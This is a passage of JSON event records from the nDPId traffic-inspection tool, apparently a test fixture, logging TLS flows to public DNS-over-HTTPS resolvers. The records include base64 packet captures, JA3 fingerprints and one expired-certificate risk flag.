DAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="} 
-00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8
eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEf
wzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} -00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+
r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbw
HD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYIt